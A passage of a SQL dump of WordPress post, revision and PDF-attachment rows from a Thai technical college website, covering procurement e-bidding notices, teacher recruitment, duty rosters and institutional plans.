ประกวดราคาซื้อครุภัณฑ์ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์ จำนวน ๑ ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '4768-revision-v1', '', '', '2018-12-08 00:09:12', '2018-12-07 17:09:12', '', 4768, 'http://www.technicrayong.ac.th/4768-revision-v1/', 0, 'revision', '', 0),
(4773, 3, '2018-12-13 15:27:57', '2018-12-13 08:27:57', '', 'แผนปฏิบัติราชการ ประจำปีงบประมาณ62-2', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%a3%e0%b8%b2%e0%b8%8a%e0%b8%81%e0%b8%b2%e0%b8%a3-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%88%e0%b8%b3%e0%b8%9b', '', '', '2018-12-13 15:27:57', '2018-12-13 08:27:57', '', 1676, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/แผนปฏิบัติราชการ-ประจำปีงบประมาณ62-2.pdf', 0, 'attachment', 'application/pdf', 0),
(4774, 3, '2018-12-13 15:31:32', '2018-12-13 08:31:32', '', 'รูปเล่มแผนพัฒนาสถานศึกษา 2562 - 2566-compressed (1)', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b9%e0%b8%9b%e0%b9%80%e0%b8%a5%e0%b9%88%e0%b8%a1%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%a8%e0%b8%b6%e0%b8%81', '', '', '2018-12-13 15:31:32', '2018-12-13 08:31:32', '', 1676, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/รูปเล่มแผนพัฒนาสถานศึกษา-2562-2566-compressed-1.pdf', 0, 'attachment', 'application/pdf', 0),
(4775, 3, '2018-12-13 15:32:38', '2018-12-13 08:32:38', '<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/12/แผนปฏิบัติราชการ-ประจำปีงบประมาณ62-2.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2562<--</a> <span style=\"color: #ff0000;\">NEW!</span></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติราชการ-สำหรับสถานศึกษา2561-1.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2561<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการปีงบประมาณ2560.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2560<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการปีงบประมาณ-2559.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2559<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\">--><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติราชการ2558.pdf\">แผนปฏิบัติราชการ ปีงบประมาณ 2558<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการ-2557.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2557<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการปีงบประมาณ-2556-.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2556<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/ปีงบประมาณ-2555n.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2555<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/2554.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2554<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการ-2553.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2553<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติราชการ-สำหรับสถานศึกษา2552.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2552<--</a></span></h4>\r\n ', 'แผนปฏิบัติราชการ', '', 'inherit', 'closed', 'closed', '', '1676-revision-v1', '', '', '2018-12-13 15:32:38', '2018-12-13 08:32:38', '', 1676, 'http://www.technicrayong.ac.th/1676-revision-v1/', 0, 'revision', '', 0),
(4776, 3, '2018-12-13 15:35:38', '2018-12-13 08:35:38', '<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/12/รูปเล่มแผนพัฒนาสถานศึกษา-2562-2566-compressed-1.pdf\">-->แผนพัฒนาสถานศึกษา ปี พ.ศ. 2562 - 2566<--</a> <span style=\"color: #ff0000;\">NEW!</span></span></h4>\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนพัฒนาสถานศึกษา-2551-2554.pdf\">-->แผนพัฒนาสถานศึกษา ปี พ.ศ. 2551-2554<--</a></span></h4>\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนพัฒนาสถานศึกษา-2555-2558.pdf\">-->แผนพัฒนาสถานศึกษา ปี พ.ศ. 2555-2558<--</a></span></h4>\n<h4><span style=\"color: #ff6600;\">--><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนพัฒนาการจัดการศึกษาปี-2557-2561-.pdf\">แผนพัฒนาสถานศึกษา ปี พ.ศ. 2557- 2561<--</a></span></h4>', 'แผนพัฒนาสถานศึกษา', '', 'inherit', 'closed', 'closed', '', '1688-autosave-v1', '', '', '2018-12-13 15:35:38', '2018-12-13 08:35:38', '', 1688, 'http://www.technicrayong.ac.th/1688-autosave-v1/', 0, 'revision', '', 0),
(4777, 3, '2018-12-13 15:35:15', '2018-12-13 08:35:15', '<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/12/รูปเล่มแผนพัฒนาสถานศึกษา-2562-2566-compressed-1.pdf\">-->แผนพัฒนาสถานศึกษา ปี พ.ศ. 2562 - 2566<--</a> <span style=\"color: #ff0000;\">NEW!</span></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนพัฒนาสถานศึกษา-2551-2554.pdf\">-->แผนพัฒนาสถานศึกษา ปี พ.ศ. 2551-2554<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนพัฒนาสถานศึกษา-2555-2558.pdf\">-->แผนพัฒนาสถานศึกษา ปี พ.ศ. 2555-2558<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\">--><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนพัฒนาการจัดการศึกษาปี-2557-2561-.pdf\">แผนพัฒนาสถานศึกษา ปี พ.ศ. 2557- 2561<--</a></span></h4>', 'แผนพัฒนาสถานศึกษา', '', 'inherit', 'closed', 'closed', '', '1688-revision-v1', '', '', '2018-12-13 15:35:15', '2018-12-13 08:35:15', '', 1688, 'http://www.technicrayong.ac.th/1688-revision-v1/', 0, 'revision', '', 0),
(4778, 3, '2018-12-13 15:54:29', '2018-12-13 08:54:29', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-3-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน ๓ อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80-6', '', '', '2018-12-13 15:54:29', '2018-12-13 08:54:29', '', 0, 'http://www.technicrayong.ac.th/?p=4778', 209, 'post', '', 0),
(4779, 3, '2018-12-13 15:54:12', '2018-12-13 08:54:12', '', 'ประกาศ รับสมัครสอบคัดเลือกครูอัตราจ้าง จำนวน 3 อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80-6', '', '', '2018-12-13 15:54:12', '2018-12-13 08:54:12', '', 4778, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/ประกาศ-รับสมัครสอบคัดเลือกครูอัตราจ้าง-จำนวน-3-อัตรา.pdf', 0, 'attachment', 'application/pdf', 0),
(4780, 3, '2018-12-13 15:54:29', '2018-12-13 08:54:29', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-3-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน ๓ อัตรา', '', 'inherit', 'closed', 'closed', '', '4778-revision-v1', '', '', '2018-12-13 15:54:29', '2018-12-13 08:54:29', '', 4778, 'http://www.technicrayong.ac.th/4778-revision-v1/', 0, 'revision', '', 0),
(4781, 3, '2018-12-14 12:12:25', '2018-12-14 05:12:25', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F20181214144730762-edit.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อครุภัณฑ์ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ จำนวน ๑ ชุด โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2-4', '', '', '2018-12-14 15:30:44', '2018-12-14 08:30:44', '', 0, 'http://www.technicrayong.ac.th/?p=4781', 208, 'post', '', 0),
(4782, 3, '2018-12-14 12:11:50', '2018-12-14 05:11:50', '', '20181213194220820', '', 'inherit', 'closed', 'closed', '', '20181213194220820', '', '', '2018-12-14 12:11:50', '2018-12-14 05:11:50', '', 4781, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/20181213194220820.pdf', 0, 'attachment', 'application/pdf', 0),
(4783, 3, '2018-12-14 12:12:25', '2018-12-14 05:12:25', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F20181213194220820.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อครุภัณฑ์ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ จำนวน ๑ ชุด โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '4781-revision-v1', '', '', '2018-12-14 12:12:25', '2018-12-14 05:12:25', '', 4781, 'http://www.technicrayong.ac.th/4781-revision-v1/', 0, 'revision', '', 0),
(4784, 3, '2018-12-14 15:30:31', '2018-12-14 08:30:31', '', '20181214144730762 edit', '', 'inherit', 'closed', 'closed', '', '20181214144730762-edit', '', '', '2018-12-14 15:30:31', '2018-12-14 08:30:31', '', 4781, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/20181214144730762-edit.pdf', 0, 'attachment', 'application/pdf', 0),
(4785, 3, '2018-12-14 15:30:44', '2018-12-14 08:30:44', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F20181214144730762-edit.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อครุภัณฑ์ชุดฝึกอิเล็กทรอนิกส์อัจฉริยะ จำนวน ๑ ชุด โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '4781-revision-v1', '', '', '2018-12-14 15:30:44', '2018-12-14 08:30:44', '', 4781, 'http://www.technicrayong.ac.th/4781-revision-v1/', 0, 'revision', '', 0),
(4786, 3, '2018-12-17 14:03:59', '2018-12-17 07:03:59', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%A1%E0%B8%81%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%A1-2562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนมกราคม 2562', '', 'publish', 'closed', 'open', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b8%a1%e0%b8%81%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%a1-2562', '', '', '2018-12-17 14:03:59', '2018-12-17 07:03:59', '', 0, 'http://www.technicrayong.ac.th/?p=4786', 207, 'post', '', 0),
(4787, 3, '2018-12-17 14:03:10', '2018-12-17 07:03:10', '', 'ตารางเวร เดือนมกราคม 2562', '', 'inherit', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b8%a1%e0%b8%81%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%a1-2562', '', '', '2018-12-17 14:03:10', '2018-12-17 07:03:10', '', 4786, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/ตารางเวร-เดือนมกราคม-2562.pdf', 0, 'attachment', 'application/pdf', 0),
(4788, 3, '2018-12-17 14:03:59', '2018-12-17 07:03:59', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%A1%E0%B8%81%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%A1-2562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนมกราคม 2562', '', 'inherit', 'closed', 'closed', '', '4786-revision-v1', '', '', '2018-12-17 14:03:59', '2018-12-17 07:03:59', '', 4786, 'http://www.technicrayong.ac.th/4786-revision-v1/', 0, 'revision', '', 0),
(4789, 3, '2018-12-17 16:31:30', '2018-12-17 09:31:30', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%8A%E0%B8%B2%E0%B8%9E%E0%B8%B4%E0%B8%88%E0%B8%B2%E0%B8%A3%E0%B8%93%E0%B9%8C-%E0%B8%AA%E0%B8%B2%E0%B8%82%E0%B8%B2%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A1-2562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประชาพิจารณ์รายละเอียดร่างคุณลักษณะเฉพาะครุภัณฑ์การศึกษา สาขาวิชาช่างเชื่อมโลหะ ประจำปีงบประมาณ ๒๕๖๒', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%9e%e0%b8%b4%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b9%8c%e0%b8%a3%e0%b8%b2%e0%b8%a2-4', '', '', '2018-12-17 16:31:30', '2018-12-17 09:31:30', '', 0, 'http://www.technicrayong.ac.th/?p=4789', 206, 'post', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4790, 3, '2018-12-17 16:31:09', '2018-12-17 09:31:09', '', 'ประกาศ ประชาพิจารณ์ สาขาวิชาช่างเชื่อม 2562', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%9e%e0%b8%b4%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%93%e0%b9%8c-%e0%b8%aa%e0%b8%b2%e0%b8%82%e0%b8%b2', '', '', '2018-12-17 16:31:09', '2018-12-17 09:31:09', '', 4789, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/ประกาศ-ประชาพิจารณ์-สาขาวิชาช่างเชื่อม-2562.pdf', 0, 'attachment', 'application/pdf', 0),
(4791, 3, '2018-12-17 16:31:30', '2018-12-17 09:31:30', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%8A%E0%B8%B2%E0%B8%9E%E0%B8%B4%E0%B8%88%E0%B8%B2%E0%B8%A3%E0%B8%93%E0%B9%8C-%E0%B8%AA%E0%B8%B2%E0%B8%82%E0%B8%B2%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A1-2562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประชาพิจารณ์รายละเอียดร่างคุณลักษณะเฉพาะครุภัณฑ์การศึกษา สาขาวิชาช่างเชื่อมโลหะ ประจำปีงบประมาณ ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4789-revision-v1', '', '', '2018-12-17 16:31:30', '2018-12-17 09:31:30', '', 4789, 'http://www.technicrayong.ac.th/4789-revision-v1/', 0, 'revision', '', 0),
(4792, 3, '2018-12-18 12:40:29', '2018-12-18 05:40:29', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%9D%E0%B8%B6%E0%B8%81%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1-%E0%B9%81%E0%B8%81%E0%B9%89%E0%B9%84%E0%B8%82.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์ชุดฝึกหุ่นยนต์อุตสาหกรรม จำนวน ๑ ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%84-5', '', '', '2018-12-21 10:10:17', '2018-12-21 03:10:17', '', 0, 'http://www.technicrayong.ac.th/?p=4792', 205, 'post', '', 0),
(4793, 3, '2018-12-18 12:39:50', '2018-12-18 05:39:50', '', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์ชุดฝึกหุ่นยนต์อุตสาหกรรม จำนวน 1 ชุด', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%84-5', '', '', '2018-12-18 12:39:50', '2018-12-18 05:39:50', '', 4792, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/ประกาศ-ประกวดราคาซื้อครุภัณฑ์ชุดฝึกหุ่นยนต์อุตสาหกรรม-จำนวน-1-ชุด.pdf', 0, 'attachment', 'application/pdf', 0),
(4794, 3, '2018-12-18 12:40:29', '2018-12-18 05:40:29', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%9D%E0%B8%B6%E0%B8%81%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-1-%E0%B8%8A%E0%B8%B8%E0%B8%94.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์ชุดฝึกหุ่นยนต์อุตสาหกรรม จำนวน ๑ ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '4792-revision-v1', '', '', '2018-12-18 12:40:29', '2018-12-18 05:40:29', '', 4792, 'http://www.technicrayong.ac.th/4792-revision-v1/', 0, 'revision', '', 0),
(4795, 3, '2018-12-18 13:36:10', '2018-12-18 06:36:10', '<h4><a href=\"/wp-content/uploads/2018/12/ปฏิทินปฏิบัติงาน-2561.pdf\">-->ปฏิทินปฏิบัติงาน 2561</a></h4>\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/06/ปฏิทินปฏิบัติงาน-ประจำปีการศึกษา-2560.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2560<--</a></span></h4>\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/03/ปฏิทินปฏิบัติงานปีการศึกษา-2559.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2559<--</a></span></h4>\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/03/ปฏิทินปฏิบัติงาน2558.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2558<--</a></span></h4>\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/03/ปฏิทินปี-57.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2557<--</a></span></h4>', 'ปฏิทินปฏิบัติงาน', '', 'inherit', 'closed', 'closed', '', '1710-autosave-v1', '', '', '2018-12-18 13:36:10', '2018-12-18 06:36:10', '', 1710, 'http://www.technicrayong.ac.th/1710-autosave-v1/', 0, 'revision', '', 0),
(4796, 3, '2018-12-18 13:35:40', '2018-12-18 06:35:40', '', 'ปฏิทินปฏิบัติงาน 2561', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%97%e0%b8%b4%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99-2561', '', '', '2018-12-18 13:35:40', '2018-12-18 06:35:40', '', 1710, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/ปฏิทินปฏิบัติงาน-2561.pdf', 0, 'attachment', 'application/pdf', 0),
